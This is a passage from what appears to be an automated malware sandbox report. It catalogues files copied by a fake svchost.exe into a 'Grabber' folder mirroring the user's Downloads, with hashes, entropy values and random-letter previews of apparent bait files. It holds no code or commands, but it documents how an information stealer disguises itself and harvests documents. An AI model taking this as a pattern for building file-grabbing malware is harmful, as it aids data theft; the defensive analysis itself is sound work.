                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
